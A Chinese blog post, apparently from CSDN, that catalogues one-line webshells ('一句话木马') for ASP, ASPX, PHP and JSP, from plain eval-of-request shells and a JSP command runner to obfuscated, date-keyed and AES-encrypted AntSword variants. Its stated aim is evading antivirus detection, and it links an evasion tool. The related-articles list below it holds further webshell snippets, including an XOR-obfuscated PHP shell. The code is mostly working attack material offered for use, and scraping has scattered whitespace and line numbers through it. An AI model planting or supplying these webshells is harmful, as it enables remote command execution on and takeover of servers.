一句话木马各种变形

最新推荐文章于 2024-05-30 16:21:29 发布
最新推荐文章于 2024-05-30 16:21:29 发布
阅读量1.7k 收藏 2
点赞数 3
分类专栏: 网络安全
原文链接:https://blog.csdn.net/sunjikui1255326447/article/details/95756961
版权

0x00:简介

        一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。一句话木马一直在跟杀软斗智斗勇,出现一种,杀软秒更新规则。木马再变形,再被杀。。。

0x01:叙事

一、常见的一句话


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:<%
     
     eval request("pass")%>
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:<%@ Page Language=
     
     "Jscript"%><%Response.Write(eval(Request.Item[
     
     "z"],
     
     "unsafe"));%>
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:<?
     
     php eval(@$_POST['a']); ?>
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:<%Runtime.getRuntime().exec(request.getParameter(
     
     "i"));%>
     
     //无回显示执行系统命令

二、简单变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:<%
     
     eval
     
     ""&(
     
     "e"&
     
     "v"&
     
     "a"&
     
     "l"&
     
     "("&
     
     "r"&
     
     "e"&
     
     "q"&
     
     "u"&
     
     "e"&
     
     "s"&
     
     "t"&
     
     "("&
     
     "0"&
     
     "-"&
     
     "2"&
     
     "-"&
     
     "5"&
     
     ")"&
     
     ")")%>
     
     //-7
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:<%@ Page Language = Jscript %>
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     <%
     
     var
     
     /*-/*-*/P
     
     /*-/*-*/=
     
     /*-/*-*/
     
     "e"+
     
     "v"+
     
     /*-/*-*/
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     "a"+
     
     "l"+
     
     "("+
     
     "R"+
     
     "e"+
     
     /*-/*-*/
     
     "q"+
     
     "u"+
     
     "e"
     
     /*-/*-*/+
     
     "s"+
     
     "t"+
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     "[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]"+
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ","+
     
     "\""+
     
     "u"+
     
     "n"+
     
     "s"
     
     /*-/*-*/+
     
     "a"+
     
     "f"+
     
     "e"+
     
     "\""+
     
     ")";
     
     eval
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     (
     
     /*-/*-*/P
     
     /*-/*-*/,
     
     /*-/*-*/
     
     "u"+
     
     "n"+
     
     "s"
     
     /*-/*-*/+
     
     "a"+
     
     "f"+
     
     "e"
     
     /*-/*-*/);%>
     
     //-7
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php $_GET[a]($_GET[b]);
     
     ?>
    
    
    
   
   
  11. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  12. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:<%
    
    
    
   
   
  13. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     if(request.getParameter(
     
     "f")!=
     
     null)(
     
     new 
    
    
    
   
   
  14. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     java.io.FileOutputStream(application.getRealPath(
     
     "\\")+request.getParameter(
     
     "f"))).write(request.getParameter(
     
     "t").getBytes());
    
    
    
   
   
  15. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     %>

三、二次变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:
     
     <%if request ("MH")<>""then session("MH")=request("MH"):end 
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     if:
     
     if session(
     
     "MH")<>
     
     "" 
     
     then 
     
     execute session(
     
     "MH")%>
     
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASPX:
     
     <%@ Page 
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     Language=
     
     "Jscript"%>
     
     
     
     <%eval(Request.Item[FormsAuthentication.HashPasswordForStoringInConfigFile(String.Format("{0:yyyyMMdd}",DateTime.Now.ToUniversalTime())+"37E4DD20C310142564FC483DB1132F36",
    
    
    
   
   
  6. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
     
     "MD5").ToUpper()],
     
     "unsafe");%>
     
     //随日期变化的连接密码
    
    
    
   
   
  7. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  8. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php ($_=@$_GET[2]).@$_($_POST[1])?>
    
    
    
   
   
  9. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  10. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:
     
     <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>

四、三次变形


 
 
  1. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     ASP:
     
     <%@Page Language="C#" %>
     
     
     
     <%@Import namespace="System.Reflection"%>
     
     
     
     <%if (Request["pass"]!=null){ Session.Add("k", Guid.NewGuid().ToString().Replace("-", "").Substring(16)); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
     
     //蚁剑中的一句话
    
    
    
   
   
  2. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  3. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     PHP:
     
     <?php session_start();isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&call_user_func($b[0],$b[1]);?>//蚁剑中的一句话
    
    
    
   
   
  4. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
     
    
    
    
   
   
  5. 
   
   
    
    
    
    
   
   
    
   
   
    
    
    
    
     
     JSP:
     
     <%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
     
     
     
     <%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
     
     
     
     <%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
     
     //蚁剑中的一句话

五、四次变形

  1、利用随机异或无限免杀d盾蚁剑版:

项目地址:https://github.com/yzddmr6/as_webshell_venom

   2、利用动态二进制加密实现新型一句话木马:

文章地址:https://xz.aliyun.com/t/2799

0x02:后话

    一句话木马变形有很多种方式,文中举例只是其中几种方式。千奇百怪的变形,不断的变化,都是为了躲避杀软的检测。杀软也在不断的更新规则库。两者都是在博弈中不断的强大。

 

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/sunjikui1255326447/article/details/95756961
稚始稚終
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP一句话木马变形
weixin_40195907的博客
11-25 2618
PHP的一句话木马 @ 表示忽略报错 $_POST 表示使用post的方式提交变量 attack代表为变量名 <?php @eval($_POST['attack'])?> 上传木马使用实例:
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
连接两个形式--免杀
m0_68976043的博客
03-13 737
大致的意思会输出一些内容 随机字符串+环境变量+随机字符串,如果用eval代替assert是完全没问题的,我查了下资料,assert是不能执行多个语句的,eval可以,所以这里使用assert会有返回为空的问题。这里简单来说就是eval函数中参数是字符,如:eval('echo 1;assert函数中参数为表达式 (或者为函数),如:assert(phpinfo())这个问题可以使用base64编码的问题解决,编码后的数据包,可以看到ant这个参数传入的是一句话,因此就可以通过assert执行成功。
关于PHP的webshell免杀小结
最新发布
2401_84488651的博客
05-30 883
我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
一句话木马的各种变形
司徒荆的博客
07-13 2537
一句话木马的各种变形
变形一句话木马
时光凉春衫薄的博客
10-14 1566
变形一句话木马 下图是一个解析的东西:这是个一句话木马变形通过异或运算来规避所有的敏感函数。。。 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?&gt...
一句话木马变形(编码)
buffedon的博客
12-20 817
一句话木马变形(编码) 注意:如果全文只是加密的密文的话,那么就相当于是一个字符串,在解析的时候不符合语义,依然不会检测出来 base64 编码 php <?php $c = base64_decode('YXNzZXJ0'); $c($_POST['pwd']); ?> java语言 <%@ Page Language="Jscript" Debug=true%> <% var a=Request.Form("mr6"); var res=System.Text.Encod
一句话木马的多种写法
huike008的博客
06-05 439
asp一句话 以下是引用片段: php一句话 以下是引用片段: aspx一句话 以下是引用片段: 可以躲过雷客图的一句话。 以下是引用片段: 不用''的asp一句话 以下是引用片段: 不用双引号的一句话。 以下是引用片段: 一句话 用批处理自动切换IP地址的方法 Server Application Error的解决方法 ...
一句话 asp木马加密版 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
php一句话cmdshell新型 (非一句话木马)
10-30
【PHP 一句话 CMDShell 新型(非一句话木马)】 在 PHP 开发中,存在一种安全漏洞,称为“一句话 CMDShell”,它允许攻击者通过在 PHP 脚本中注入命令来执行系统级别的操作。虽然通常的一句话木马是直接执行 PHP ...
asp一句话.zip
06-28
- `Response.Write Execute(Request("cmd"))`:这是一个典型的一句话木马,它接收GET或POST请求中的"cmd"参数,然后执行命令并返回结果。 - `Eval(Request("data"))`:这行代码会评估接收到的数据,如果数据包含...
一句话木马变形
qq_45751902的博客
10-25 1215
这个函数原本是利用正则表达式替换符合条件的字符串,但是这个函数有一个功能——可执行命令。使用方法:先用浏览器访问,生成新的文件"hello.php",再连接"hello.php"。这里是base64解密函数,"YXNzZXJ0"是assert的base64加密。第三行使用了变量函数$a,变量储存了函数名eval,便可以直接用变量替代函数名。,按照PHP的格式,表达式在两个“/”之间。把用户传递的数据生成一个函数fun(),然后再执行fun()。利用函数生成文件,第一个参数是文件名,第二个参数是文件的内容。
PHP一句话木马Webshell变形免杀总结
weixin_30559481的博客
11-20 1685
0×00 前言 大部分Webshell查杀工具都是基于关键字特征的,通常他们会维护一个关键字列表,以此遍历指定扩展名的文件来进行扫描,所以可能最先想到的是各种字符串变形,下面总结了一些小的方法,各种不足之前还请看官拍砖. 0×01 字符串上的舞蹈 一般标准的一句话Webshell是利用PHP的eval函数,动态执行其他函数功能.其标准的形式如下: @eval ($_POS...
ASP+PHP+ASP.NET+JSP各种变形一句话大集结
harryxlb的专栏
07-02 2684
var lcx = {'名字' : Request.form('#'), '性别' : eval, '年龄' : '18', '昵称' : '请叫我一声老大'}; lcx.性别((lcx.名字)+''); %> 用冰狐就行了 @preg_replace("/[email]/e",$_POST['h'],"error");  ?>  菜刀附加数据:  h=@ev
变种一句话木马
qq_44060093的博客
04-04 928
墨者学院有一道例题 我们打开网站发现了一串php代码 <?php @$_++;$__=("`"^"?").(":"^"}").("%"^"`").("{"^"/");$___=("$"^"{").("~"^".").("/"^"`").("-"^"~").("("^"|");${$__}[!$_](${$___}[$_]); ?> 看着很乱里面用了好多异或运算,但我们只需要打印出...
php一句话木马变形技巧
小司机的奥拓
12-25 1388
更换执行数据来源字符替换或者编码采取隐匿手段tips:使用一句话木马的时候可以在函数前加”@”符,这个符号让php语句不显示错误信息,增加隐蔽性。
复现一句话木马
lml_0916的博客
07-23 380
发现了2的值是直接输入的的一些PHP获取文件的函数的字符串,但是assert()函数的参数不可以使用字符串。首先右键添加一个新的数据,将刚刚编写的文件名输入到URL地址中,然后连接密码设置的是2。这样的话同时满足了assert()的参数必须是函数和表达式中的一种,和eval语句中有可以传递的参数,所以连接成功。解决的方式就是修改了一下我的php版本,一开始我用实验的版本是7.3.4的,后面改成了5.3.29的版本扣可以了、但是刚刚直接使用eval进行连接的时候是可以连接的,为什么这样替换就不可以了?....
一句话木马的工作原理
热门推荐
liwei8703的专栏
11-19 7万+
<br />一句话木马的工作原理:一句话木马分析服务端与客户端。<br />"一句话木马"服务端(是用于本地的html提交脚本木马文件)<br />就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改<br />"一句话木马"客户端(远程服务器上被插入一句话的asp可执行文件)<br />用来向服务端
excel一句话木马
01-26
Excel一句话木马是一种利用Excel文件进行攻击的恶意软件。它通过在Excel文件中嵌入恶意宏代码来实现攻击目标。当用户打开包含恶意宏代码的Excel文件时,该代码会在用户的计算机上执行,并可能导致系统被入侵或数据被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值